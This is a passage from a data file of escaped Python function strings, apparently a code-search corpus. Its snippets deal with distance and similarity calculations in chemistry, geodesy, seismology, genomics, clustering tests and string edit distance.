= (config_2.data).sort_values('item')\n\t\tbox_dim_1 = config_1.box_dim\n\t\tbox_dim_2 = config_2.box_dim\n\t\ti = 0\n\t\ttotal_distance = 0.0\n\t\tfor index, row in sorted_data_1.iterrows():\n\t\t\tatom_1 = Atom.from_ds(row)\n\t\t\tatom_1.box_dim = box_dim_1\n\t\t\tatom_2 = Atom.from_ds(sorted_data_2.iloc[i])\n\t\t\tatom_2.box_dim = box_dim_2\n\t\t\tatom_dist = Atom.distance_pbc(atom_1,atom_2)\n\t\t\ttotal_distance = total_distance + atom_dist ** 2\n\t\t\ti = i + 1\n\t\treturn total_distance ** 0.5", "def adjust_clinker_ratio(self, d_act):\n\n for d in d_act:\n\n ratio_to_reach = self.clinker_ratio_remind.sel(dict(\n region=self.geo.iam_to_iam_region(d) if self.model == \"image\" else d\n )).values\n\n share = []\n ratio = []\n\n for exc in d_act[d]['exchanges']:\n if 'cement' in exc['product'] and exc['type'] == \"technosphere\":\n share.append(exc['amount'])\n ratio.append(self.clinker_ratio_eco[(exc['name'], exc['location'])])\n\n share = np.array(share)\n ratio = np.array(ratio)\n\n average_ratio = (share * ratio).sum()\n\n iteration = 0\n while average_ratio > ratio_to_reach and iteration < 100:\n share[share == 0] = np.nan\n\n ratio = np.where(share >= 0.001, ratio, np.nan)\n\n highest_ratio = np.nanargmax(ratio)\n lowest_ratio = np.nanargmin(ratio)\n\n share[highest_ratio] -= .01\n share[lowest_ratio] += .01\n\n average_ratio = (np.nan_to_num(ratio) * np.nan_to_num(share)).sum()\n iteration += 1\n\n share = np.nan_to_num(share)\n\n count = 0\n for exc in d_act[d]['exchanges']:\n if 'cement' in exc['product'] and exc['type'] == \"technosphere\":\n exc['amount'] = share[count]\n count += 1\n\n return d_act", "def test_distance():\n t0 = time.time()\n c1 = coord.CelestialCoord(0.234 * coord.radians, 0.342 * coord.radians)\n c2 = coord.CelestialCoord(0.234 * coord.radians, -1.093 * coord.radians)\n c3 = coord.CelestialCoord((pi + 0.234) * coord.radians, -0.342 * coord.radians)\n c4 = coord.CelestialCoord((pi + 0.234) * coord.radians, 0.832 * coord.radians)\n c5 = coord.CelestialCoord(1.832 * coord.radians, -0.723 * coord.radians)\n c6 = coord.CelestialCoord((0.234 + 2.3e-9) * coord.radians, (0.342 + 1.2e-9) * coord.radians)\n t1 = time.time()\n\n a1 = astropy.coordinates.SkyCoord(0.234 * units.radian, 0.342 * units.radian)\n a2 = astropy.coordinates.SkyCoord(0.234 * units.radian, -1.093 * units.radian)\n a3 = astropy.coordinates.SkyCoord((pi + 0.234) * units.radian, -0.342 * units.radian)\n a4 = astropy.coordinates.SkyCoord((pi + 0.234) * units.radian, 0.832 * units.radian)\n a5 = astropy.coordinates.SkyCoord(1.832 * units.radian, -0.723 * units.radian)\n a6 = astropy.coordinates.SkyCoord(0.234 + 2.3e-9, 0.342 + 1.2e-9, unit=units.radian)\n t2 = time.time()\n\n coord_dist = [c1.distanceTo(c).rad for c in [c2,c3,c4,c5,c6]]\n t3 = time.time()\n astropy_dist = [a1.separation(a).rad for a in [a2,a3,a4,a5,a6]]\n t4 = time.time()\n\n np.testing.assert_almost_equal(coord_dist, astropy_dist, decimal=12)\n # For the last one, the distance is rather small in radians, so test in arcsec\n np.testing.assert_almost_equal(coord_dist[-1] * (coord.radians/coord.arcsec),\n astropy_dist[-1] * (coord.radians/coord.arcsec), decimal=10)\n\n print('Compare times for distance calculations:')\n print(' Make CelestialCoords: t = ',t1-t0)\n print(' Make SkyCoords: t = ',t2-t1)\n print(' Calculate distances with Coord: t = ',t3-t2)\n print(' Calculate distances with Astropy: t = ',t4-t3)", "def calcDist(indexLabel1,indexLabel2):\n x1=xCord[indexLabel1]\n x2=xCord[indexLabel2]\n y1=yCord[indexLabel1]\n y2=yCord[indexLabel2]\n z1=zCord[indexLabel1]\n z2=zCord[indexLabel2]\n distance=(((x1-x2)**2+(y2-y1)**2+(z2-z1)**2)**0.5)\n return distance", "def _computeRdist(self, rtype, lon, lat, depth):\n\n # ----------------------------\n # Sort out ps2ff parameters\n # ----------------------------\n origin = self._origin\n mech = getattr(origin, 'mech', 'ALL')\n if not hasattr(origin, '_tectonic_region'):\n mscale = MagScaling.WC94\n smech = Mechanism.A\n mindip_deg = 10.0\n maxdip_deg = 90.0\n aspect = 1.7\n elif origin._tectonic_region == 'Active Shallow Crust':\n mscale = MagScaling.HB08\n aspect = 1.7\n if mech == 'ALL':\n # HB08 doesn't have an 'ALL' mechanism, so use WC94\n mscale = MagScaling.WC94\n smech = Mechanism.A\n mindip_deg = 10.0\n maxdip_deg = 90.0\n elif mech == 'RS':\n smech = Mechanism.R\n mindip_deg = 35.0\n maxdip_deg = 50.0\n elif mech == 'NM':\n smech = Mechanism.N\n mindip_deg = 40.0\n maxdip_deg = 60.0\n elif mech == 'SS':\n smech = Mechanism.SS\n mindip_deg = 75.0\n maxdip_deg = 90.0\n elif origin._tectonic_region == 'Stable Shallow Crust':\n mscale = MagScaling.S14\n aspect = 1.0\n if mech == 'ALL':\n smech = Mechanism.A\n mindip_deg = 10.0\n maxdip_deg = 90.0\n elif mech == 'RS':\n smech = Mechanism.R\n mindip_deg = 30.0\n maxdip_deg = 60.0\n elif mech == 'NM':\n smech = Mechanism.N\n mindip_deg = 40.0\n maxdip_deg = 60.0\n elif mech == 'SS':\n smech = Mechanism.SS\n mindip_deg = 60.0\n maxdip_deg = 90.0\n else:\n logging.warning(\n 'Unsupported tectonic region; using coefficients for unknown'\n 'tectonic region.')\n mscale = MagScaling.WC94\n smech = Mechanism.A\n aspect = 1.7\n mindip_deg = 10.0\n maxdip_deg = 90.0\n\n mindip = mindip_deg * np.pi / 180.0\n maxdip = maxdip_deg * np.pi / 180.0\n\n repis = np.clip(self.computeRepi(lon, lat, depth), 0.0001, None)\n\n repi, Rjb_hat, Rrup_hat, Rjb_var, Rrup_var = \\\n single_event_adjustment(origin.mag, origin.depth, ar=aspect,\n mechanism=smech, mag_scaling=mscale,\n n_repi=13,\n min_repi=np.min(repis) - 1e-5,\n max_repi=np.max(repis) + 0.1,\n nxny=7, n_theta=19,\n n_dip=4, min_dip=mindip, max_dip=maxdip,\n n_eps=5, trunc=2)\n\n if rtype == 'Rjb':\n spline = spint.interp1d(repi, np.vstack((Rjb_hat, Rjb_var)),\n kind='linear', copy=False,\n assume_sorted=True)\n rv_hat = spline(repis)\n elif rtype == 'Rrup':\n spline = spint.interp1d(repi, np.vstack((Rrup_hat, Rrup_var)),\n kind='linear', copy=False,\n assume_sorted=True)\n rv_hat = spline(repis)\n else:\n raise ValueError('Unknown distance type in _computeRdist')\n return (rv_hat[0], rv_hat[1])", "def cdist(c1, c2, otype=0, frame=False):\n if not otype in [0, 1, 2]:\n raise ValueError(\"unsupported otype: %d, must be in 0:2\" % otype)\n assert c1.shape[0] == c2.shape[0]\n T = c1.shape[0]\n\n s = ((c1[:, 1:] - c2[:, 1:])**2).sum(-1)\n if otype == 0:\n s = numpy.sqrt(2 * s) * 10 / numpy.log(10)\n elif otype == 2:\n s = numpy.sqrt(s)\n if frame:\n return s\n else:\n return s.mean()", "def ctc(target):\n network = target.project.network\n throats = network.throats(target.name)\n cn = network['throat.conns'][throats]\n C1 = network['pore.coords'][cn[:, 0]]\n C2 = network['pore.coords'][cn[:, 1]]\n value = _norm(C1 - C2, axis=1)\n return value", "def find_TSS_CRE_pairs(self):\n if self.verbose >= 2:\n print(\"\\r{}\\rFinding TSS-cCRE pairs\".format(' ' * 80), end='', file=sys.stderr)\n TSS_ranges = self.find_TSS_ranges()\n if self.skip_cre_promoter:\n pair_indices = numpy.r_[0, numpy.cumsum(TSS_ranges[:, 1] - TSS_ranges[:, 0]\n + TSS_ranges[:, 3] - TSS_ranges[:, 2])]\n else:\n pair_indices = numpy.r_[0, numpy.cumsum(TSS_ranges[:, 1] - TSS_ranges[:, 0])]\n # Normalize predicted values for easy correlation\n pair_queue = multiprocessing.JoinableQueue()\n results_queue = multiprocessing.JoinableQueue()\n processes = []\n for i in range(self.threads):\n processes.append(multiprocessing.Process(\n target=self._find_correlations, args=(pair_queue, results_queue)))\n processes[-1].daemon = True\n processes[-1].start()\n step = 50\n for i in range(self.chroms.shape[0]):\n for j in range(self.rna_indices[i], self.rna_indices[i + 1], step):\n end = min(j + step, self.rna_indices[i + 1])\n pair_queue.put((j, end, TSS_ranges[j:end, :]))\n for i in range(self.threads):\n pair_queue.put(None)\n pairs = numpy.zeros((pair_indices[-1], 3), dtype=numpy.int32)\n valid = numpy.zeros(pair_indices[-1], dtype=numpy.bool)\n finished = 0\n while finished < self.threads:\n results = results_queue.get(True)\n if results is None:\n finished += 1\n continue\n for i in range(len(results)):\n index, corrs = results[i][:2]\n s = pair_indices[index]\n e = pair_indices[index + 1]\n pairs[s:e, 0] = index\n if self.skip_cre_promoter:\n pairs[s:e, 1] = numpy.r_[numpy.arange(TSS_ranges[index, 0], TSS_ranges[index, 1]),\n numpy.arange(TSS_ranges[index, 2], TSS_ranges[index, 3])]\n else:\n pairs[s:e, 1] = numpy.arange(TSS_ranges[index, 0], TSS_ranges[index, 1])\n valid[s:e] = corrs >= self.corr_cutoff\n self.pairs = pairs[numpy.where(valid)[0], :]\n self.TSS_indices = numpy.r_[0, numpy.cumsum(numpy.bincount(self.pairs[:, 0],\n minlength=self.tssN))]\n self.selected = numpy.ones(self.pairs.shape[0], dtype=numpy.bool)\n if self.pca is not None:\n self.find_PCAs()\n if self.maxcres > 0:\n where = numpy.where(self.TSS_indices[1:] - self.TSS_indices[:-1] > self.maxcres)[0]\n for i in where:\n s, e = self.TSS_indices[i:(i + 2)]\n self.selected[self.rng.choice(numpy.arange(s, e), e - s - self.maxcres,\n replace=False)] = False\n if self.verbose >= 2:\n print(\"\\r{}\\r\".format(' ' * 80), end='', file=sys.stderr)\n kept = numpy.sum(valid)\n temp = numpy.bincount(self.pairs[:, 0], weights=self.selected, minlength=self.tssN)\n self.logger.info(\"Retained {} of {} TSS-CRE pairs ({:02.2f}%), {} - {} CREs/TSS (median {})\".format(\n self.selected.shape[0], valid.shape[0],\n 100. * self.selected.shape[0] / valid.shape[0],\n numpy.amin(temp), numpy.amax(temp), numpy.median(temp)))\n self.logger.info(\"Unique CREs in pairings: {}\".format(numpy.unique(self.pairs[:, 1]).shape[0]))", "def distance(self, first_tape, second_tape):\n pairs = zip(first_tape, second_tape)\n return math.sqrt(abs(sum(map((lambda n: self.subsq(*n)), pairs))))", "def communication_delay(self, begin, end):\n\n duration, path = self.movement_model.shortest_distance(begin, end)\n path_clusters = self.count_clusters(path)\n\n segment_speed_pairs = list()\n path_index = 0\n last_segment = None\n for path_cluster in path_clusters:\n segments = list()\n if last_segment:\n segments.append(last_segment)\n\n while path[path_index] in path_cluster.tour.objects:\n segments.append(path[path_index])\n last_segment = path[path_index]\n\n path_index += 1\n if path_index >= len(path):\n break\n\n segment_speed_pairs.append((path_cluster.mdc_speed, segments))\n\n travel_delay = 0. # * pq.second\n for speed, segments in segment_speed_pairs:\n cluster_distance = 0 # * pq.meter\n start_segment = segments[0]\n for end_segment in segments[1:]:\n distance = np.linalg.norm(\n start_segment.location.nd - end_segment.location.nd)\n cluster_distance += distance\n\n travel_delay += cluster_distance / speed\n\n transmission_delay = len(path_clusters)\n transmission_delay *= data.segment_volume(begin, end, self.env)\n transmission_delay /= self.env.comms_rate\n\n relay_delay = self.holding_time(path_clusters[1:])\n\n total_delay = travel_delay + transmission_delay + relay_delay\n return total_delay", "def test_example_10_sparse():\n import pandas as pd\n from tcrdist.repertoire import TCRrep\n from tcrdist.rep_funcs import pw2dense\n import numpy as np\n\n df = pd.read_csv(\"dash.csv\")\n df2 = pd.read_csv(\"dash2.csv\")\n df = df.head(10) #(1)\n tr = TCRrep(cell_df = df, #(2)\n df2 = df2, \n organism = 'mouse', \n chains = ['alpha','beta'], \n db_file = 'alphabeta_gammadelta_db.tsv')\n\n tr.compute_rect_distances(df = tr.clone_df, df2 = df2)\n assert tr.rw_alpha.shape == (10,1924) \n assert tr.rw_beta.shape == (10,1924)\n\n rw_alpha = tr.rw_alpha.copy()\n rw_beta = tr.rw_beta.copy()\n\n radius = 100\n tr.cpus = 1\n tr.compute_sparse_rect_distances(df = tr.clone_df, df2 = df2, radius = radius)\n d = pw2dense(tr.rw_alpha, radius)\n print(rw_alpha[:2, :10])\n print(tr.rw_alpha.todense()[:2, :10])\n print(d[:2, :10])\n assert np.all(rw_alpha[rw_alpha <= radius] == d[d <= radius])\n\n d = pw2dense(tr.rw_beta, radius)\n assert np.all(rw_beta[rw_beta <= radius] == d[d <= radius])\n\n \n radius = 5000\n tr.compute_sparse_rect_distances(df = tr.clone_df, df2 = df2, radius = radius)\n d = pw2dense(tr.rw_alpha, radius)\n print(rw_alpha[:2, :10])\n print(tr.rw_alpha.todense()[:2, :10])\n assert np.all(rw_alpha == d)\n\n d = pw2dense(tr.rw_beta, radius)\n assert np.all(rw_beta == d)", "def dist_chord(datamtx, strict=True):\n if strict:\n if not all(isfinite(datamtx)):\n raise ValueError(\"non finite number in input matrix\")\n if rank(datamtx) != 2:\n raise ValueError(\"input matrix not 2D\")\n numrows, numcols = shape(datamtx)\n else:\n try:\n numrows, numcols = shape(datamtx)\n except ValueError:\n return zeros((0,0),'d')\n\n if numrows == 0 or numcols == 0:\n return zeros((0,0),'d')\n dists = zeros((numrows,numrows),'d')\n for i in range(numrows):\n r1 = datamtx[i] # cache here\n r1norm = norm(r1)\n for j in range(i):\n r2 = datamtx[j]\n r2norm = norm(r2)\n if r1norm == 0.0 or r2norm == 0.0:\n if r1norm == 0.0 and r2norm == 0.0:\n dist = 0.0\n else: dist = 1.0\n else:\n dist = norm(r1/r1norm - r2/r2norm)\n dists[i,j] = dists[j,i] = dist\n\n return dists", "def calc_dist(c1: Coordinates, c2: Coordinates = None) -> float:\n\t\n\t# Get distances for each dimension in a common unit, meters.\n\tlat_dist = (c1.lat - c2.lat) * LAT_RATIO\n\tlong_dist = (c1.lon - c2.lon) * LONG_RATIO\n\treturn math.sqrt(lat_dist**2 + long_dist**2)", "def calc_distance(\n target_batch_keys, target_keys_pred, batch_assignments_gt, src_key_num_gt\n):\n batch_keys_gt = torch.bmm(batch_assignments_gt, target_batch_keys[:, :, :2])\n err = distance(target_keys_pred, batch_keys_gt, src_key_num_gt)\n return err", "def _compute_dist(x_obs, x_theo):\n\n from fastdtw import fastdtw\n score, path = fastdtw(x_obs, x_theo, dist=2)\n\n return score", "def test_distances(self):\n sf = make_classifier_data(n=10, d=2, seed=37)\n sf.remove_column(\"class\", inplace=True)\n\n numeric_features = [\"int0\", \"int1\", \"float0\", \"float1\"]\n array_features = [\"array0\"]\n string_features = [\"str0\"]\n dict_features = [\"dict0\"]\n\n ## Numeric standard distances should work for numeric columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Numeric standard distances should work for array columns\n for d in [\n \"euclidean\",\n \"squared_euclidean\",\n \"manhattan\",\n \"cosine\",\n \"transformed_dot_product\",\n ]:\n try:\n m = tc.dbscan.create(\n sf,\n features=array_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## String standard distances should work.\n for d in [\"levenshtein\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n ## Dictionary standard distances should work.\n for d in [\"jaccard\", \"weighted_jaccard\", \"cosine\", \"transformed_dot_product\"]:\n try:\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=d,\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n except:\n assert False, \"Standard distance {} failed.\".format(d)\n\n # Nonsensical combinations of feature types and distances should fail.\n with self.assertRaises(ValueError):\n m = tc.dbscan.create(\n sf,\n features=numeric_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=dict_features,\n distance=\"levenshtein\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n with self.assertRaises(ToolkitError):\n m = tc.dbscan.create(\n sf,\n features=string_features,\n distance=\"euclidean\",\n radius=1,\n min_core_neighbors=3,\n verbose=False,\n )\n\n # If no distance is specified, the automatic distance construction\n # should kick in and be correct.\n correct_dist = [\n [[\"str0\"], \"levenshtein\", 1],\n [[\"str1\"], \"levenshtein\", 1],\n [[\"dict0\"], \"jaccard\", 1],\n [[\"int0\", \"int1\", \"float0\", \"float1\"], \"euclidean\", 1],\n [[\"array0\"], \"euclidean\", 1],\n ]\n\n m = tc.dbscan.create(\n sf, radius=1, distance=None, min_core_neighbors=3, verbose=False\n )\n\n self.assertItemsEqual(m.distance, correct_dist)\n\n m = tc.dbscan.create(\n sf, radius=1, distance=\"auto\", min_core_neighbors=3, verbose=False\n )\n self.assertItemsEqual(m.distance, correct_dist)", "def cal_dist(origs,dests):\n\tradius = 6371.009 # km\n\tif origs.ndim:\n\t\tlat1, lon1 = origs\n\t\tlat2, lon2 = dests\n\telse:\n\t\tlat1 = origs[0,:]\n\t\tlon1 = origs[1,:]\n\t\tlat2 = dests[0,:]\n\t\tlon2 = dests[1,:]\n\tdlat = (lat2-lat1) / 180. * np.pi\n\tdlon = (lon2-lon1) / 180. * np.pi\n\ta = np.sin(dlat/2) * np.sin(dlat/2) + np.cos(lat1 / 180. * np.pi) \\\n\t\t* np.cos(lat2 / 180. * np.pi) * np.sin(dlon/2) * np.sin(dlon/2)\n\tc = 2 * np.arctan2(np.sqrt(a), np.sqrt(1-a))\n\treturn radius * c", "def get_dist_cost(data, start_node_id, end_node_id):\n p1 = get_coords(data, start_node_id)\n p2 = get_coords(data, end_node_id)\n return great_circle_distance(p1, p2)", "def distance(self):\n _, _, costs = self.calculate_costs()\n return np.sum(costs)", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def get_race_distance(self):\n race_id = self.get_current_race_id(include_horse=False)\n race_id_with_horse = self.get_current_race_id(include_horse=True)\n try:\n distance = self.consolidated_races_db.data.loc[race_id, 'distance']\n return distance\n except KeyError:\n try:\n distance = self.db.data.loc[race_id_with_horse, 'distance']\n return distance\n except KeyError:\n self.verbose_print(f'No race distance info found for {self.current_race_id}')\n return None", "def Distance2RRhoPhi(r1,r2,r3):\n \n # Calculate the square-distances of \n # each pair of atoms.\n r1 = np.array(r1)\n r2 = np.array(r2) \n r3 = np.array(r3)\n \n rr1 = r1*r1\n rr2 = r2*r2\n rr3 = r3*r3\n \n return TriatomicRadialPolar.DistanceSquared2RRhoPhi(rr1,rr2,rr3)", "def dc_dt(self,C,t,K):\n \n # dc/dt built up by separately computing the positive and negative contributions.\n # In our example positive_dcdt = [0, k1[A], k2[B]] and negative_dcdt = [-k1[A],-k2[B],0]\n reaction_matrix = np.array(self.reaction_matrix,dtype=np.int)\n C = np.array(C)\n #K = np.array(K.valuesdict().values())\n\n # need to have the same number of rate parameters in K\n # as indicated in reaction_matrix!\n assert len(K) == np.sum(reaction_matrix)\n \n # need to be careful about dtypes:\n # reaction matrix dtype is int, rate matrix must be dtype float\n rate_matrix = reaction_matrix.copy()\n rate_matrix.dtype=np.float64\n rate_matrix[reaction_matrix==1] = K\n \n positive_dcdt = rate_matrix.T.dot(C)\n negative_dcdt = rate_matrix.T.sum(axis=0)*C\n \n return positive_dcdt - negative_dcdt", "def calc_distances(ftr, prfx=None):\n print(time.asctime(), ' Computing distances')\n start = time.time()\n dst = util.compute_pair_distances(ftr)\n end = time.time()\n print(time.asctime(), ' Done Computing distances in ', end-start, ' seconds', flush=True)\n\n # Only save if requested (this can be a very large file)\n if prfx is not None:\n np.save('mat_' + prfx, dst)\n\n return dst", "def distance(brd1,brd2):\n\n step=brd1[1,0]-brd1[0,0]\n return np.sum(np.abs(brd1[:,1]-brd2[:,1]))*step", "def get_wmd_dist(s1, s2, model):\r\n s1 = s1.lower().strip().split()\r\n s2 = s2.lower().strip().split()\r\n\r\n distance = model.wmdistance(s1, s2)\r\n return distance", "def trame_distance(t1, t2):\n return np.linalg.norm(t1 - t2)", "def _distance_from_weights(self, data):\n input_data = array(data)\n weights_flat = self._weights.reshape(-1, self._weights.shape[2])\n input_data_sq = power(input_data, 2).sum(axis=1, keepdims=True)\n weights_flat_sq = power(weights_flat, 2).sum(axis=1, keepdims=True)\n cross_term = dot(input_data, weights_flat.T)\n return sqrt(-2 * cross_term + input_data_sq + weights_flat_sq.T)", "def distance(self, wn1, wn2):\n return abs(self.chunk_map[wn1] - self.chunk_map[wn2])", "def test_4():\n\n # generate two locusts of points\n npts = 100\n epsilon = 0.001\n # #cluster 1\n coords1 = generate_locus_of_3d_points(npts, 0.1, 0.1, 0.1, epsilon=epsilon)\n # cluster 2\n coords2 = generate_locus_of_3d_points(npts, 0.9, 0.9, 0.9, epsilon=epsilon)\n\n # generate orientation vectors for cluster 1\n vectors1 = generate_aligned_vectors(len(coords1))\n\n # calculate dot product between vectors1 and cluster 2\n r = np.sqrt((0.9 - 0.1) ** 2 + (0.9 - 0.1) ** 2 + (0.9 - 0.1) ** 2)\n # s, vector between coords1 and cluster2\n s = np.zeros((npts, 3))\n s[:, 0] = 0.9 - coords1[:, 0]\n s[:, 1] = 0.9 - coords1[:, 1]\n s[:, 2] = 0.9 - coords1[:, 2]\n\n # calculate dot product between orientation and direction between cluster 1 and 2\n angles = angles_between_list_of_vectors(vectors1, s)\n costheta_squared = np.cos(angles) * np.cos(angles) # dot product between vectors\n avg_costheta_squared = np.mean(costheta_squared)\n\n # define radial bins\n rbins = np.array([0.0, 0.1, r + 2.0 * epsilon])\n\n # define weights appropiate for weighting function\n weights1 = np.ones((npts, 4))\n weights1[:, 1] = vectors1[:, 0]\n weights1[:, 2] = vectors1[:, 1]\n weights1[:, 3] = vectors1[:, 2]\n weights2 = np.ones(npts)\n\n # calculate weighted counts\n weighted_counts, counts = positional_marked_npairs_3d(\n coords1,\n coords2,\n rbins,\n period=None,\n weights1=weights1,\n weights2=weights2,\n weight_func_id=4,\n num_threads=1,\n )\n\n msg = \"weighted counts do not match expected result given the weighting function\"\n assert np.isclose(\n weighted_counts[-1], avg_costheta_squared * counts[-1], rtol=1.0 / npts\n ), msg", "def test_example_12():\n\timport pandas as pd\n\tfrom tcrdist.repertoire import TCRrep\n\timport numpy as np\n\n\tdf = pd.read_csv(\"dash.csv\").head(100)\n\ttr = TCRrep(cell_df = df,\n\t\torganism = 'mouse',\n\t\tchains = ['alpha','beta'],\n\t\tdb_file = 'alphabeta_gammadelta_db.tsv',\n\t\tstore_all_cdr=False,\n\t\tarchive_result=True,\n\t\tarchive_name = \"example_archive\")\n\n\ttr2 = TCRrep(cell_df = None,\n\t\torganism = 'mouse',\n\t\tchains = ['alpha','beta'],\n\t\tdb_file = 'alphabeta_gammadelta_db.tsv',\n\t\tblank = True,\n\t\tarchive_name = \"example_archive\")\n\ttr2.rebuild()\n\n\t# Check that all atrributes are the same after rebuild, except metrics which can't be zipped\n\tfor k in tr2.__dict__.keys():\n\t\tprint(k)\n\t\tif k in ['all_genes','metrics_a','metrics_b','metrics_d', 'metrics_g',\n\t\t\t\t'kargs_a','kargs_b','kargs_d','kargs_g']:\n\t\t\tpass\n\t\telse:\n\t\t\tassert np.all(getattr(tr, k) == getattr(tr2, k) )\n\n\tfor k in ['all_genes','metrics_a','metrics_b', 'kargs_a','kargs_b']:\n\t\tassert isinstance(getattr(tr2, k), dict)\n\t\tassert set(getattr(tr, k).keys()) - set(getattr(tr2, k).keys()) == set()", "def process_ctd():\n ctd_concat_list = []\n ctd_flist = glob.glob(CMORE_BULA_path + \"CTD/\" + \"*.ctd\")\n for ctd_cast in ctd_flist:\n df = pd.read_csv(\n ctd_cast,\n delim_whitespace=True,\n skiprows=3,\n names=[\n \"CTDPRS\",\n \"CTDTMP\",\n \"CTDSAL\",\n \"CTDOXY\",\n \"PAR\",\n \"LS6000\",\n \"CHLPIG\",\n \"NITRATE\",\n \"num_observations\",\n \"QUALT1\",\n ],\n )\n df.replace(-9.0, np.nan, inplace=True)\n station_cast_meta = os.path.basename(ctd_cast).split(\".\")[0].split(\"bu1\")[1]\n df[\"station\"] = station_cast_meta.split(\"s\")[1].split(\"c\")[0].zfill(3)\n df[\"cast\"] = (\n station_cast_meta.split(\"c\")[1].split(\"up\")[0].split(\"dn\")[0].zfill(3)\n )\n df[\"cast_direction\"] = station_cast_meta[-2:]\n df[\"num_observations\"] = df[\"num_observations\"].astype(str).str.zfill(5)\n df[\n [\n \"CTDPRS_flag\",\n \"CTDTMP_flag\",\n \"CTDSAL_flag\",\n \"CTDOXY_flag\",\n \"PAR_flag\",\n \"LS6000_flag\",\n \"CHLPIG_flag\",\n \"NITRATE_flag\",\n ]\n ] = (\n df[\"QUALT1\"].astype(str).str.extractall(\"(.)\")[0].unstack()\n )\n df.drop(\n [\"NITRATE\", \"NITRATE\", \"LS6000\", \"LS6000_flag\", \"QUALT1\"],\n axis=1,\n inplace=True,\n )\n\n ctd_concat_list.append(df)\n concat_df = pd.concat(ctd_concat_list, axis=0, ignore_index=True)\n return concat_df", "def test_get_lm3_dist(self, dist):\n pytest.importorskip(\"lmoments3\")\n dc = generic.get_dist(dist)\n lm3dc = generic.get_lm3_dist(dist)\n par = self.params[dist]\n expected = dc(**par).pdf(self.inputs_pdf)\n values = lm3dc(**par).pdf(self.inputs_pdf)\n np.testing.assert_array_almost_equal(values, expected)", "def conduit_lengths(network, throats=None, mode='pore'):\n if throats is None:\n throats = network.throats()\n Ps = network['throat.conns']\n pdia = network['pore.diameter']\n\n if mode == 'centroid':\n try:\n pcentroids = network['pore.centroid']\n tcentroids = network['throat.centroid']\n if _sp.sum(_sp.isnan(pcentroids)) + _sp.sum(_sp.isnan(tcentroids)) > 0:\n mode = 'pore'\n else:\n plen1 = _sp.sqrt(_sp.sum(_sp.square(pcentroids[Ps[:, 0]] -\n tcentroids), 1))-network['throat.length']/2\n plen2 = _sp.sqrt(_sp.sum(_sp.square(pcentroids[Ps[:, 1]] -\n tcentroids), 1))-network['throat.length']/2\n except KeyError:\n mode = 'pore'\n if mode == 'pore':\n # Find half-lengths of each pore\n pcoords = network['pore.coords']\n # Find the pore-to-pore distance, minus the throat length\n lengths = _sp.sqrt(_sp.sum(_sp.square(pcoords[Ps[:, 0]] -\n pcoords[Ps[:, 1]]), 1)) - network['throat.length']\n lengths[lengths < 0.0] = 2e-9\n # Calculate the fraction of that distance from the first pore\n try:\n fractions = pdia[Ps[:, 0]]/(pdia[Ps[:, 0]] + pdia[Ps[:, 1]])\n # Don't allow zero lengths\n# fractions[fractions == 0.0] = 0.5\n# fractions[fractions == 1.0] = 0.5\n except:\n fractions = 0.5\n plen1 = lengths*fractions\n plen2 = lengths*(1-fractions)\n\n return _sp.vstack((plen1, network['throat.length'], plen2)).T[throats]", "def damerau_levenshtein_distance(comp_sec):\n s1 = comp_sec['log_trace']\n s2 = comp_sec['sim_trace']\n p1 = comp_sec['proc_log_trace']\n p2 = comp_sec['proc_sim_trace']\n w1 = comp_sec['wait_log_trace']\n w2 = comp_sec['wait_sim_trace']\n d = {}\n lenstr1 = len(s1)\n lenstr2 = len(s2)\n for i in range(-1,lenstr1+1):\n d[(i,-1)] = i+1\n for j in range(-1,lenstr2+1):\n d[(-1,j)] = j+1\n for i in range(0, lenstr1):\n for j in range(0, lenstr2):\n if s1[i] == s2[j]:\n t1 = p1[i] + w1[i]\n if t1 > 0:\n b1 = (p1[i]/t1)\n b2 = (w1[i]/t1)\n cost = (b1*abs(p2[j]-p1[i])) + (b2*abs(w2[j]-w1[i]))\n else:\n cost = 0\n else:\n cost = 1\n d[(i,j)] = min(\n d[(i-1,j)] + 1, # deletion\n d[(i,j-1)] + 1, # insertion\n d[(i-1,j-1)] + cost, # substitution\n )\n if i and j and s1[i]==s2[j-1] and s1[i-1] == s2[j]:\n d[(i,j)] = min (d[(i,j)], d[i-2,j-2] + cost) # transposition\n return d[lenstr1-1,lenstr2-1]", "def dist_word(self, str1):\n\n min_dist = float(\"inf\")\n min_str = \"\"\n\n if str1 in self._txt1.data:\n # allocate list for computation of the maximum size\n warp = [[1 for j in range(int(self._txt1[str1].freq * self._groupFactor) + 1)]\n for i in range(self._txt1[str1].freq + 1)]\n\n for str2 in self._distWords[str1]:\n dist = float(self._distWords[str1][str2])\n if dist == float(\"inf\"):\n # compute dtw\n dist = self.dtw(warp, self.txt1[str1].rec, self.txt2[str2].rec)\n self._distWords[str1][str2] = dist\n if dist < min_dist:\n min_dist = dist\n min_str = str2\n return min_dist, min_str", "def distance_between_gt_pred(gt_list_rad, pred_list_rad):\n\n gt_len, pred_len = gt_list_rad.shape[0], pred_list_rad.shape[0]\n ind_pairs = np.array([[x, y] for y in range(pred_len) for x in range(gt_len)])\n cost_mat = np.zeros((gt_len, pred_len))\n\n # Slow implementation\n # cost_mat = np.zeros((gt_len, pred_len))\n # for gt_cnt, gt in enumerate(gt_list_rad):\n # for pred_cnt, pred in enumerate(pred_list_rad):\n # cost_mat[gt_cnt, pred_cnt] = distance_between_spherical_coordinates_rad(gt, pred)\n\n # Fast implementation\n if gt_len and pred_len:\n az1, ele1, az2, ele2 = gt_list_rad[ind_pairs[:, 0], 0], gt_list_rad[ind_pairs[:, 0], 